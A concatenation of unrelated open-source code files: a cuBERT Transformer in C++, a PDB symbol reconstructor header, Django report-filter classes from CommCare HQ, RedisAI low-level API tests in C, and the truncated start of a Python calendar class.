gemm_algo<T>("GEMM_ALGO_OUTPUT"));
T *output_norm_beta = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/output/LayerNorm/beta");
T *output_norm_gamma = var.at(
var_prefix + "/layer_" + std::to_string(layer_idx) + "/output/LayerNorm/gamma");
output_layer_norm[layer_idx] = new LayerNorm<T>(max_batch_size * seq_length, hidden_size,
output_norm_beta, output_norm_gamma);
}
}
template <typename T>
Transformer<T>::~Transformer() {
for (int i = 0; i < num_hidden_layers; ++i) {
delete output_layer_norm[i];
delete output_dense[i];
delete intermediate_act_fn[i];
delete intermediate_dense[i];
delete attention_output_norm[i];
delete attention_output_dense[i];
delete attention_self[i];
cuBERT::free(layer_output[i]);
cuBERT::free(intermediate_output[i]);
cuBERT::free(attention_output[i]);
cuBERT::free(attention_heads[i]);
}
cuBERT::free(neg_attention_mask_buffer);
delete attention_mask;
}
template <typename T>
T *Transformer<T>::compute(size_t batch_size, T *input_gpu, int8_t *attention_mask) {
_pre_compute(batch_size);
return _in_compute(batch_size, input_gpu, attention_mask);
}
template <typename T>
void Transformer<T>::_pre_compute(size_t batch_size) {
for (int i = 0; i < num_hidden_layers; ++i) {
attention_self[i]->_pre_compute(batch_size);
attention_output_dense[i]->_pre_compute(batch_size * seq_length, attention_output[i]);
intermediate_dense[i]->_pre_compute(batch_size * seq_length, intermediate_output[i]);
output_dense[i]->_pre_compute(batch_size * seq_length, layer_output[i]);
}
}
template <typename T>
T *Transformer<T>::_in_compute(size_t batch_size, T *input_gpu, int8_t *attention_mask) {
void* stream = cuBERT::blas_get_stream(cublas);
// broadcast neg_attention_mask
this->attention_mask->compute(batch_size, attention_mask, neg_attention_mask_buffer);
T *prev_output = input_gpu;
for (int i = 0; i < num_hidden_layers; ++i) {
T *layer_input = prev_output;
// attention/self
attention_self[i]->_in_compute(batch_size, layer_input, neg_attention_mask_buffer);
// attention/output
attention_output_dense[i]->_in_compute(batch_size * seq_length, attention_heads[i], attention_output[i]);
attention_output_norm[i]->compute_(batch_size * seq_length, layer_input, attention_output[i], stream);
// intermediate
intermediate_dense[i]->_in_compute(batch_size * seq_length, attention_output[i], intermediate_output[i]);
intermediate_act_fn[i]->compute_(batch_size * seq_length * intermediate_size, intermediate_output[i], stream);
// output
output_dense[i]->_in_compute(batch_size * seq_length, intermediate_output[i], layer_output[i]);
output_layer_norm[i]->compute_(batch_size * seq_length, attention_output[i], layer_output[i], stream);
prev_output = layer_output[i];
}
return prev_output;
}
template class Transformer<float>;
#ifdef HAVE_CUDA
template class Transformer<half>;
#endif
}
| 5,128 |
625 | <gh_stars>100-1000
#pragma once
#include "PDB.h"
#include "UdtFieldDefinitionBase.h"
class PDBReconstructorBase
{
public:
//
// Called when reached the 'enum' type.
// If the return value is true, the enum will be expanded.
//
virtual
bool
OnEnumType(
const SYMBOL* Symbol
)
{
return false;
}
//
// Called when entering into the 'enum' type
// which will be expanded.
//
virtual
void
OnEnumTypeBegin(
const SYMBOL* Symbol
)
{
}
//
// Called when leaving from the 'enum' type.
//
virtual
void
OnEnumTypeEnd(
const SYMBOL* Symbol
)
{
}
//
// Called for each field of the curent 'enum' type.
//
virtual
void
OnEnumField(
const SYMBOL_ENUM_FIELD* EnumField
)
{
}
//
// Called when reached the UDT (struct/class/union)
// If the return value is true, the UDT will be expanded.
//
virtual
bool
OnUdt(
const SYMBOL* Symbol
)
{
return false;
}
//
// Called when entering into the UDT (struct/class/union)
// which will be expanded.
//
virtual
void
OnUdtBegin(
const SYMBOL* Symbol
)
{
}
//
// Called when leaving from the current UDT.
//
virtual
void
OnUdtEnd(
const SYMBOL* Symbol
)
{
}
//
// Called when entering into the field of the current UDT.
//
virtual
void
OnUdtFieldBegin(
const SYMBOL_UDT_FIELD* UdtField
)
{
}
//
// Called when leaving from the field of the current UDT.
//
virtual
void
OnUdtFieldEnd(
const SYMBOL_UDT_FIELD* UdtField
)
{
}
//
// Called for each field in the current UDT.
//
virtual
void
OnUdtField(
const SYMBOL_UDT_FIELD* UdtField,
UdtFieldDefinitionBase* MemberDefinition
)
{
}
//
// Called when entering into the nested anonymous UDT (struct/class/union)
// which will be expanded.
//
virtual
void
OnAnonymousUdtBegin(
UdtKind Kind,
const SYMBOL_UDT_FIELD* FirstUdtField
)
{
}
//
// Called when leaving from the current nested anonymous UDT.
//
virtual
void
OnAnonymousUdtEnd(
UdtKind Kind,
const SYMBOL_UDT_FIELD* FirstUdtField,
const SYMBOL_UDT_FIELD* LastUdtField,
DWORD Size
)
{
}
//
// Called when entering the bitfield.
//
virtual
void
OnUdtFieldBitFieldBegin(
const SYMBOL_UDT_FIELD* FirstUdtFieldBitField,
const SYMBOL_UDT_FIELD* LastUdtFieldBitField
)
{
}
//
// Called when leaving the bitfield.
//
virtual
void
OnUdtFieldBitFieldEnd(
const SYMBOL_UDT_FIELD* FirstUdtFieldBitField,
const SYMBOL_UDT_FIELD* LastUdtFieldBitField
)
{
}
//
// Called when a padding member should be created.
//
virtual
void
OnPaddingMember(
const SYMBOL_UDT_FIELD* UdtField,
BasicType PaddingBasicType,
DWORD PaddingBasicTypeSize,
DWORD PaddingSize
)
{
}
//
// Called when a padding bitfield field should be created.
//
virtual
void
OnPaddingBitFieldField(
const SYMBOL_UDT_FIELD* UdtField,
const SYMBOL_UDT_FIELD* PreviousUdtField
)
{
}
};
| 1,362 |
471 | from django.template.loader import render_to_string
# For translations
from django.utils.translation import ugettext_noop
import pytz
from memoized import memoized
from corehq.apps.hqwebapp.crispy import CSS_FIELD_CLASS, CSS_LABEL_CLASS
class BaseReportFilter(object):
"""
For filtering the results of CommCare HQ Reports.
slug => the parameter you get back from the request
template => the template to render this filter
label => the filter's label
"""
slug = None
template = None
label = None
css_class = "span4"
help_text = None
is_cacheable = False
help_style_bubble = False
def __init__(self, request, domain=None, timezone=pytz.utc, parent_report=None,
css_label=None, css_field=None):
self.domain = domain
if self.slug is None:
raise NotImplementedError("slug is required")
if self.template is None:
raise NotImplementedError("a template must be specified")
if self.label is None:
raise NotImplementedError("label is required")
self.request = request
self.timezone = timezone
self.parent_report = parent_report
self.css_label = css_label or (CSS_LABEL_CLASS + ' control-label')
self.css_field = css_field or CSS_FIELD_CLASS
self.context = {}
@property
def is_disabled(self):
"""
If necessary, determine whether to show this filter based on the results of surrounding (related) filters.
"""
return False
@property
def filter_context(self):
"""
Context for rendering the filter.
Should return a dict.
"""
raise NotImplementedError("filter_context must be overridden")
def render(self):
if self.is_disabled:
return ""
self.context.update({
'slug': self.slug,
'label': self.label,
'css_id': 'report_filter_%s' % self.slug,
'css_class': self.css_class,
'css_label_class': self.css_label,
'css_field_class': self.css_field,
'help_text': self.help_text,
'help_style_bubble': self.help_style_bubble,
})
filter_context = self.filter_context
if not (filter_context, dict):
raise ValueError("filter_context must return a dict.")
self.context.update(filter_context)
return render_to_string(self.template, self.context)
@classmethod
def get_value(cls, request, domain):
return request.GET.get(cls.slug)
class CheckboxFilter(BaseReportFilter):
slug = "checkbox"
label = "hello"
template = "reports/filters/checkbox.html"
@property
def filter_context(self):
return {'checked': self.request.GET.get(self.slug, False)}
@classmethod
def get_value(cls, request, domain):
val = request.GET.get(cls.slug, False)
if not val:
return False
else:
return val is True or val == 'True' or val == 'true'
class BaseSingleOptionFilter(BaseReportFilter):
"""
Displays a select field.
"""
template = "reports/filters/single_option.html"
default_text = ugettext_noop("Filter by...")
placeholder = ''
is_paginated = False
pagination_source = None # url for paginated data
async_handler = None
async_action = None
@property
def options(self):
"""
Options should return a list of tuples formatted like:
[('value', 'display_text')]
"""
raise NotImplementedError("options must be overridden")
@property
@memoized
def selected(self):
return self.get_value(self.request, self.domain) or ""
@property
def filter_context(self):
options = []
if not self.is_paginated:
options = self.options
if not isinstance(options, list) and not isinstance(options[0], tuple) and not len(options[0]) == 2:
raise ValueError("options must return a list of option tuples [('value','text')].")
options = [{'val': val, 'text': text} for val, text in self.options]
return {
'select': {
'options': options,
'default_text': self.default_text,
'selected': self.selected,
'placeholder': self.placeholder,
},
'pagination': {
'enabled': self.is_paginated,
'url': self.pagination_source,
'handler': self.async_handler.slug if self.async_handler else '',
'action': self.async_action,
},
}
@classmethod
def get_value(cls, request, domain):
value = super(BaseSingleOptionFilter, cls).get_value(request, domain)
if cls.is_paginated:
return value if value else None
if isinstance(cls, cls):
instance = cls
else:
instance = cls(request, domain)
valid_options = [op[0] for op in instance.options]
if value in valid_options:
return value
return None
class BaseMultipleOptionFilter(BaseSingleOptionFilter):
"""
Displays a multiselect field.
"""
template = "reports/filters/multi_option.html"
default_options = [] # specify a list
@classmethod
def get_value(cls, request, domain):
return request.GET.getlist(cls.slug)
@property
@memoized
def selected(self):
return self.get_value(self.request, self.domain) or self.default_options
class BaseDrilldownOptionFilter(BaseReportFilter):
"""
Displays multiple select fields that display in a hierarchial order and drill down to one value.
Ex:
Select Application: <applications>
---> Select Module: <module options based on selected application (if selected)>
---------> Select Form: <form_options based on selected module (if selected)>
use_only_last => Whether to indicate to the user that they must move all the way through the hierarchy
and select a final option before the result is usable. For example, you can't just pick an application
and show all of its forms, you must select exactly one form.
"""
template = "reports/filters/drilldown_options.html"
use_only_last = False
drilldown_empty_text = ugettext_noop("No Data Available")
is_cacheable = True
@property
def drilldown_map(self):
"""
Should return a structure like:
[{
'val': <value>,
'text': <text>,
'next': [
{
'val': <value>,
'text' <text>,
'next': [...]
},
{...}
]
},
{...}
]
"""
raise NotImplementedError("drilldown_map must be implemented")
@classmethod
def get_labels(cls):
"""
Returns a list of ('label', default text/caption', 'slug') tuples.
ex: [
('Application', 'Select Application...', 'app'),
('Module', 'Select Module...', 'module'),
('Form', 'Select Form...', 'form')
]
"""
raise NotImplementedError("get_labels must be implemented")
@property
def selected(self):
selected = []
for label in self.rendered_labels:
value = self._get_label_value(self.request, label)
if not value['value']:
break
selected.append(value['value'])
return selected
@property
def rendered_labels(self):
"""
Modify the default set of labels here.
"""
return self.get_labels()
@property
def filter_context(self):
controls = []
for level, label in enumerate(self.rendered_labels):
controls.append({
'label': label[0],
'default_text': label[1],
'slug': label[2],
'level': level,
})
drilldown_map = list(self.drilldown_map)
return {
'option_map': drilldown_map,
'controls': controls,
'selected': self.selected,
'use_last': self.use_only_last,
'notifications': self.final_notifications,
'empty_text': self.drilldown_empty_text,
'is_empty': not drilldown_map,
}
@property
def final_notifications(self):
"""
Not required, but this can be used to display a message when the drill down is complete
that's based on the value of the final drill down option.
ex: {'xmlns_of_form': 'This form does not have a unique id.'}
"""
return {}
@property
@memoized
def GET_values(self):
values = []
for label in self.rendered_labels:
value = self._get_label_value(self.request, label)
if not value['value']:
break
values.append(value)
return values
def _map_structure(self, val, text, next=None):
if next is None:
next = []
return {
'val': val,
'text': text,
'next': next,
}
@property
def shared_pagination_GET_params(self):
return [dict(name='%s_%s' % (self.slug, val['slug']), value=val['value']) for val in self.GET_values]
@classmethod
def _get_label_value(cls, request, label):
slug = str(label[2])
val = request.GET.get('%s_%s' % (cls.slug, slug))
return {
'slug': slug,
'value': val,
}
@classmethod
def get_value(cls, request, domain):
instance = cls(request, domain)
return instance.GET_values, instance
class BaseTagsFilter(BaseReportFilter):
template = "reports/filters/base_tags_filter.html"
tags = []
@property
def selected(self):
return self.get_value(self.request, self.domain) or ''
@property
def filter_context(self):
return {
'tags': self.tags,
'selected': self.selected,
'placeholder': self.placeholder,
}
class BaseSimpleFilter(BaseReportFilter):
template = "reports/filters/simple.html"
slug = None
# use ugettext_lazy for below properties
label = None
help_title = None
help_content = None
help_inline = None
@property
def filter_context(self):
return {
'default': self.request.GET.get(self.slug, ""),
'help_title': self.help_title,
'help_content': self.help_content,
'help_inline': self.help_inline
}
| 4,943 |
652 | <gh_stars>100-1000
#define REDISMODULE_MAIN
#include "DAG_utils.h"
#include <errno.h>
#include <string.h>
typedef enum LLAPI_status {
LLAPI_RUN_NONE = 0,
LLAPI_RUN_SUCCESS,
LLAPI_RUN_ERROR,
LLAPI_NUM_OUTPUTS_ERROR
} LLAPI_status;
pthread_mutex_t global_lock = PTHREAD_MUTEX_INITIALIZER;
pthread_cond_t global_cond = PTHREAD_COND_INITIALIZER;
int RAI_llapi_basic_check(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
RAI_Error *err;
RedisAI_InitError(&err);
if (RedisAI_GetErrorCode(err) == RedisAI_ErrorCode_OK) {
RedisModule_ReplyWithSimpleString(ctx, "OK");
}
RedisModule_ReplyWithError(ctx, "ERROR");
RedisAI_FreeError(err);
return REDISMODULE_OK;
}
static void _ScriptFinishFunc(RAI_OnFinishCtx *onFinishCtx, void *private_data) {
RAI_Error *err;
if (RedisAI_InitError(&err) != REDISMODULE_OK)
goto finish;
RAI_ScriptRunCtx *sctx = RedisAI_GetAsScriptRunCtx(onFinishCtx, err);
if (RedisAI_GetErrorCode(err) != RedisAI_ErrorCode_OK) {
*(int *)private_data = LLAPI_RUN_ERROR;
goto finish;
}
if (RedisAI_ScriptRunCtxNumOutputs(sctx) != 1) {
*(int *)private_data = LLAPI_NUM_OUTPUTS_ERROR;
goto finish;
}
RAI_Tensor *tensor = RedisAI_ScriptRunCtxOutputTensor(sctx, 0);
double expceted[4] = {4, 6, 4, 6};
double val[4];
// Verify that we received the expected tensor at the end of the run.
for (long long i = 0; i < 4; i++) {
if (!RedisAI_TensorGetValueAsDouble(tensor, i, &val[i])) {
goto finish;
}
if (expceted[i] != val[i]) {
goto finish;
}
}
*(int *)private_data = LLAPI_RUN_SUCCESS;
finish:
RedisAI_FreeError(err);
pthread_mutex_lock(&global_lock);
pthread_cond_signal(&global_cond);
pthread_mutex_unlock(&global_lock);
}
static void _ModelFinishFunc(RAI_OnFinishCtx *onFinishCtx, void *private_data) {
RAI_Error *err;
if (RedisAI_InitError(&err) != REDISMODULE_OK)
goto finish;
RAI_ModelRunCtx *mctx = RedisAI_GetAsModelRunCtx(onFinishCtx, err);
if (RedisAI_GetErrorCode(err) != RedisAI_ErrorCode_OK) {
*(int *)private_data = LLAPI_RUN_ERROR;
goto finish;
}
if (RedisAI_ModelRunCtxNumOutputs(mctx) != 1) {
*(int *)private_data = LLAPI_NUM_OUTPUTS_ERROR;
goto finish;
}
RAI_Tensor *tensor = RedisAI_ModelRunCtxOutputTensor(mctx, 0);
double expceted[4] = {4, 9, 4, 9};
double val[4];
// Verify that we received the expected tensor at the end of the run.
for (long long i = 0; i < 4; i++) {
if (!RedisAI_TensorGetValueAsDouble(tensor, i, &val[i])) {
goto finish;
}
if (expceted[i] != val[i]) {
goto finish;
}
}
*(int *)private_data = LLAPI_RUN_SUCCESS;
finish:
RedisAI_FreeError(err);
pthread_mutex_lock(&global_lock);
pthread_cond_signal(&global_cond);
pthread_mutex_unlock(&global_lock);
}
static int _ExecuteModelRunAsync(RedisModuleCtx *ctx, RAI_ModelRunCtx *mctx) {
LLAPI_status status = LLAPI_RUN_NONE;
pthread_mutex_lock(&global_lock);
if (RedisAI_ModelRunAsync(mctx, _ModelFinishFunc, &status) != REDISMODULE_OK) {
pthread_mutex_unlock(&global_lock);
RedisAI_ModelRunCtxFree(mctx);
RedisModule_ReplyWithError(ctx, "Async run could not start");
return LLAPI_RUN_NONE;
}
// Wait until the onFinish callback returns.
pthread_cond_wait(&global_cond, &global_lock);
pthread_mutex_unlock(&global_lock);
RedisAI_ModelRunCtxFree(mctx);
return status;
}
static int _ExecuteScriptRunAsync(RedisModuleCtx *ctx, RAI_ScriptRunCtx *sctx) {
LLAPI_status status = LLAPI_RUN_NONE;
pthread_mutex_lock(&global_lock);
if (RedisAI_ScriptRunAsync(sctx, _ScriptFinishFunc, &status) != REDISMODULE_OK) {
pthread_mutex_unlock(&global_lock);
RedisAI_ScriptRunCtxFree(sctx);
RedisModule_ReplyWithError(ctx, "Async run could not start");
return LLAPI_RUN_NONE;
}
// Wait until the onFinish callback returns.
pthread_cond_wait(&global_cond, &global_lock);
pthread_mutex_unlock(&global_lock);
RedisAI_ScriptRunCtxFree(sctx);
return status;
}
int RAI_llapi_modelRun(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
// The model m{1} should exist in key space.
const char *keyNameStr = "m{1}";
RedisModuleString *keyRedisStr = RedisModule_CreateString(ctx, keyNameStr, strlen(keyNameStr));
RedisModuleKey *key = RedisModule_OpenKey(ctx, keyRedisStr, REDISMODULE_READ);
RAI_Model *model = RedisModule_ModuleTypeGetValue(key);
RAI_ModelRunCtx *mctx = RedisAI_ModelRunCtxCreate(model);
RedisModule_FreeString(ctx, keyRedisStr);
RedisModule_CloseKey(key);
// Test the case of a failure in the model run execution (no inputs specified).
if (_ExecuteModelRunAsync(ctx, mctx) != LLAPI_RUN_ERROR) {
return RedisModule_ReplyWithSimpleString(ctx, "Async run should end with an error");
}
mctx = RedisAI_ModelRunCtxCreate(model);
// The tensors a{1} and b{1} should exist in key space.
// Load the tensors a{1} and b{1} and add them as inputs for m{1}.
keyNameStr = "a{1}";
keyRedisStr = RedisModule_CreateString(ctx, keyNameStr, strlen(keyNameStr));
key = RedisModule_OpenKey(ctx, keyRedisStr, REDISMODULE_READ);
RAI_Tensor *input1 = RedisModule_ModuleTypeGetValue(key);
RedisAI_ModelRunCtxAddInput(mctx, "a", input1);
RedisModule_FreeString(ctx, keyRedisStr);
RedisModule_CloseKey(key);
keyNameStr = "b{1}";
keyRedisStr = RedisModule_CreateString(ctx, keyNameStr, strlen(keyNameStr));
key = RedisModule_OpenKey(ctx, keyRedisStr, REDISMODULE_READ);
RAI_Tensor *input2 = RedisModule_ModuleTypeGetValue(key);
RedisAI_ModelRunCtxAddInput(mctx, "b", input2);
RedisModule_FreeString(ctx, keyRedisStr);
RedisModule_CloseKey(key);
// Add the expected output tensor.
RedisAI_ModelRunCtxAddOutput(mctx, "mul");
if (_ExecuteModelRunAsync(ctx, mctx) != LLAPI_RUN_SUCCESS)
return RedisModule_ReplyWithSimpleString(ctx, "Async run failed");
return RedisModule_ReplyWithSimpleString(ctx, "Async run success");
}
int RAI_llapi_scriptRun(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
// The script 'myscript{1}' should exist in key space.
const char *keyNameStr = "myscript{1}";
RedisModuleString *keyRedisStr = RedisModule_CreateString(ctx, keyNameStr, strlen(keyNameStr));
RedisModuleKey *key = RedisModule_OpenKey(ctx, keyRedisStr, REDISMODULE_READ);
RAI_Script *script = RedisModule_ModuleTypeGetValue(key);
RAI_ScriptRunCtx *sctx = RedisAI_ScriptRunCtxCreate(script, "bad_func");
RedisModule_FreeString(ctx, keyRedisStr);
RedisModule_CloseKey(key);
// Test the case of a failure in the script run execution (func name does not exist in script).
if (_ExecuteScriptRunAsync(ctx, sctx) != LLAPI_RUN_ERROR) {
return RedisModule_ReplyWithSimpleString(ctx, "Async run should end with an error");
}
sctx = RedisAI_ScriptRunCtxCreate(script, "bar");
RAI_Error *err;
// The tensors a{1} and b{1} should exist in key space.
// Load the tensors a{1} and b{1} and add them as inputs for the script.
keyNameStr = "a{1}";
keyRedisStr = RedisModule_CreateString(ctx, keyNameStr, strlen(keyNameStr));
key = RedisModule_OpenKey(ctx, keyRedisStr, REDISMODULE_READ);
RAI_Tensor *input1 = RedisModule_ModuleTypeGetValue(key);
RedisAI_ScriptRunCtxAddTensorInput(sctx, input1);
RedisModule_FreeString(ctx, keyRedisStr);
RedisModule_CloseKey(key);
keyNameStr = "b{1}";
keyRedisStr = RedisModule_CreateString(ctx, keyNameStr, strlen(keyNameStr));
key = RedisModule_OpenKey(ctx, keyRedisStr, REDISMODULE_READ);
RAI_Tensor *input2 = RedisModule_ModuleTypeGetValue(key);
RedisAI_ScriptRunCtxAddTensorInput(sctx, input2);
RedisModule_FreeString(ctx, keyRedisStr);
RedisModule_CloseKey(key);
// Add the expected output tensor.
RedisAI_ScriptRunCtxAddOutput(sctx);
if (_ExecuteScriptRunAsync(ctx, sctx) != LLAPI_RUN_SUCCESS)
return RedisModule_ReplyWithSimpleString(ctx, "Async run failed");
return RedisModule_ReplyWithSimpleString(ctx, "Async run success");
}
int RAI_llapi_DAGRun(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
// Test the case a successful and failure tensor load input to DAG.
if (testLoadTensor(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "LOAD tensor test failed");
}
// Test the case of a failure due to addition of a non compatible MODELRUN op.
if (testModelRunOpError(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "MODELRUN op error test failed");
}
// Test the case of a failure due an empty DAG.
if (testEmptyDAGError(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "DAG keys mismatch error test failed");
}
// Test the case of a failure due to an op within a DAG whose inkey does not exist in the DAG.
if (testKeysMismatchError(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "DAG keys mismatch error test failed");
}
// Test the case of building and running a DAG with LOAD, TENSORGET and MODELRUN ops.
if (testSimpleDAGRun(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "Simple DAG run test failed");
}
// Test the case of building and running a DAG with TENSORSET, SCRIPTRUN and TENSORGET ops.
if (testSimpleDAGRun2(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "Simple DAG run2 test failed");
}
// Test the case of building the same DAG as in previous test, but when this time it should
// return with an error.
if (testSimpleDAGRun2Error(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "Simple DAG run2 error test failed");
}
// Test the case of building DAG ops from string.
if (testBuildDAGFromString(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "Build DAG from string test failed");
}
return RedisModule_ReplyWithSimpleString(ctx, "DAG run success");
}
int RAI_llapi_DAG_resnet(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
if (testDAGResnet(ctx) != LLAPIMODULE_OK) {
return RedisModule_ReplyWithSimpleString(ctx, "DAG resnet failed");
}
return RedisModule_ReplyWithSimpleString(ctx, "DAG resnet success");
}
int RAI_llapi_CreateTensor(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
int n_dims = 2;
long long dims[] = {1, 4};
// Try to create a tensor with a non-supported data type.
RAI_Tensor *t = RedisAI_TensorCreate("INVALID", dims, n_dims);
if (t != NULL) {
return RedisModule_ReplyWithSimpleString(ctx,
"invalid data type tensor create test failed");
}
// create an empty tensor and validate that in contains zeros
t = RedisAI_TensorCreate("INT8", dims, n_dims);
int8_t expected_blob[4] = {0};
if (t == NULL || RedisAI_TensorLength(t) != dims[0] * dims[1] ||
memcmp(RedisAI_TensorData(t), expected_blob, 4) != 0) {
return RedisModule_ReplyWithSimpleString(ctx, "empty tensor create test failed");
}
RedisAI_TensorFree(t);
// create an invalid bool tensor
t = RedisAI_TensorCreate("BOOL", dims, n_dims);
uint8_t data_blob[4] = {2, 0, 0, 0}; // This value is invalid for bool type
if (RedisAI_TensorSetData(t, (const char *)data_blob, 4) != 0) {
return RedisModule_ReplyWithSimpleString(ctx, "invalid bool tensor data set test failed");
}
RedisAI_TensorFree(t);
// This should fail since the blob contains only one null-terminated string, while the tensor's
// len should be 4.
RAI_Tensor *t1 = RedisAI_TensorCreate("STRING", dims, n_dims);
const char *data_blob1 = "only one string\0";
if (RedisAI_TensorSetData(t1, data_blob1, strlen(data_blob1)) != 0) {
return RedisModule_ReplyWithSimpleString(ctx, "invalid string tensor data set test failed");
}
RedisAI_TensorFree(t1);
return RedisModule_ReplyWithSimpleString(ctx, "create tensor test success");
}
int RAI_llapi_ConcatenateTensors(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
int n_dims = 2;
long long dims[] = {1, 4};
// test concatenation of string tensors
RAI_Tensor *t1 = RedisAI_TensorCreate("STRING", dims, n_dims);
const char *data_blob1 = "first\0second\0third\0forth\0";
size_t len_data_blob1 = 25;
if (RedisAI_TensorSetData(t1, data_blob1, len_data_blob1) != 1) {
return RedisModule_ReplyWithSimpleString(ctx, "string tensor data set test failed");
}
// the second tensor's shape is [2,4], while the previous shape was [1,4]
dims[0] = 2;
const char *data_blob2 = "A\0B\0C\0D\0E\0F\0G\0H\0";
size_t len_data_blob2 = 16;
RAI_Tensor *t2 = RedisAI_TensorCreate("STRING", dims, n_dims);
if (RedisAI_TensorSetData(t2, data_blob2, len_data_blob2) != 1) {
return RedisModule_ReplyWithSimpleString(ctx, "string tensor data set test failed");
}
RAI_Tensor *tensors[] = {t1, t2};
RAI_Tensor *batched_tensor = RedisAI_TensorCreateByConcatenatingTensors(tensors, 2);
RedisAI_TensorFree(t1);
RedisAI_TensorFree(t2);
const char *expected_batched_data = "first\0second\0third\0forth\0A\0B\0C\0D\0E\0F\0G\0H\0";
size_t expected_batched_data_len = len_data_blob1 + len_data_blob2;
if (batched_tensor == NULL || RedisAI_TensorNumDims(batched_tensor) != 2 ||
RedisAI_TensorDim(batched_tensor, 0) != 3 || RedisAI_TensorDim(batched_tensor, 1) != 4 ||
memcmp(expected_batched_data, RedisAI_TensorData(batched_tensor),
expected_batched_data_len) != 0) {
return RedisModule_ReplyWithSimpleString(ctx, "string tensor concatenation test failed");
}
RedisAI_TensorFree(batched_tensor);
return RedisModule_ReplyWithSimpleString(ctx, "concatenate tensors test success");
}
int RAI_llapi_SliceTensor(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
if (argc > 1) {
RedisModule_WrongArity(ctx);
return REDISMODULE_OK;
}
int n_dims = 2;
long long dims[] = {3, 4};
RAI_Tensor *batched_tensor = RedisAI_TensorCreate("STRING", dims, n_dims);
const char *batched_data = "first\0second\0third\0forth\0A\0B\0C\0D\0E\0F\0G\0H\0";
size_t len_data_batch1 = 25;
size_t len_data_batch2 = 16;
RedisAI_TensorSetData(batched_tensor, batched_data, len_data_batch1 + len_data_batch2);
// test slicing string tensors
RAI_Tensor *t1 = RedisAI_TensorCreateBySlicingTensor(batched_tensor, 0, 1);
RAI_Tensor *t2 = RedisAI_TensorCreateBySlicingTensor(batched_tensor, 1, 2);
RedisAI_TensorFree(batched_tensor);
if (t1 == NULL || RedisAI_TensorNumDims(t1) != 2 || RedisAI_TensorDim(t1, 0) != 1 ||
RedisAI_TensorDim(t1, 1) != 4 ||
memcmp(batched_data, RedisAI_TensorData(t1), len_data_batch1) != 0) {
return RedisModule_ReplyWithSimpleString(ctx, "string tensor slicing test failed");
}
if (t2 == NULL || RedisAI_TensorNumDims(t2) != 2 || RedisAI_TensorDim(t2, 0) != 2 ||
RedisAI_TensorDim(t2, 1) != 4 ||
memcmp(batched_data + len_data_batch1, RedisAI_TensorData(t2), len_data_batch2) != 0) {
return RedisModule_ReplyWithSimpleString(ctx, "string tensor slicing test failed");
}
RedisAI_TensorFree(t1);
RedisAI_TensorFree(t2);
return RedisModule_ReplyWithSimpleString(ctx, "slice tensor test success");
}
int RedisModule_OnLoad(RedisModuleCtx *ctx, RedisModuleString **argv, int argc) {
REDISMODULE_NOT_USED(argv);
REDISMODULE_NOT_USED(argc);
if (RedisModule_Init(ctx, "RAI_llapi", 1, REDISMODULE_APIVER_1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisAI_Initialize(ctx) != REDISMODULE_OK)
RedisModule_Log(ctx, "warning",
"could not initialize RedisAI api, running without AI support.");
if (RedisModule_CreateCommand(ctx, "RAI_llapi.basic_check", RAI_llapi_basic_check, "", 0, 0,
0) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "RAI_llapi.modelRun", RAI_llapi_modelRun, "", 0, 0, 0) ==
REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "RAI_llapi.scriptRun", RAI_llapi_scriptRun, "", 0, 0, 0) ==
REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "RAI_llapi.DAGRun", RAI_llapi_DAGRun, "", 0, 0, 0) ==
REDISMODULE_ERR) {
return REDISMODULE_ERR;
}
if (RedisModule_CreateCommand(ctx, "RAI_llapi.DAG_resnet", RAI_llapi_DAG_resnet, "", 0, 0, 0) ==
REDISMODULE_ERR) {
return REDISMODULE_ERR;
}
if (RedisModule_CreateCommand(ctx, "RAI_llapi.CreateTensor", RAI_llapi_CreateTensor, "", 0, 0,
0) == REDISMODULE_ERR) {
return REDISMODULE_ERR;
}
if (RedisModule_CreateCommand(ctx, "RAI_llapi.ConcatenateTensors", RAI_llapi_ConcatenateTensors,
"", 0, 0, 0) == REDISMODULE_ERR) {
return REDISMODULE_ERR;
}
if (RedisModule_CreateCommand(ctx, "RAI_llapi.SliceTensor", RAI_llapi_SliceTensor, "", 0, 0,
0) == REDISMODULE_ERR) {
return REDISMODULE_ERR;
}
return REDISMODULE_OK;
}
| 8,107 |
713 | class MyCalendarTwo(object):
def __init__(self):
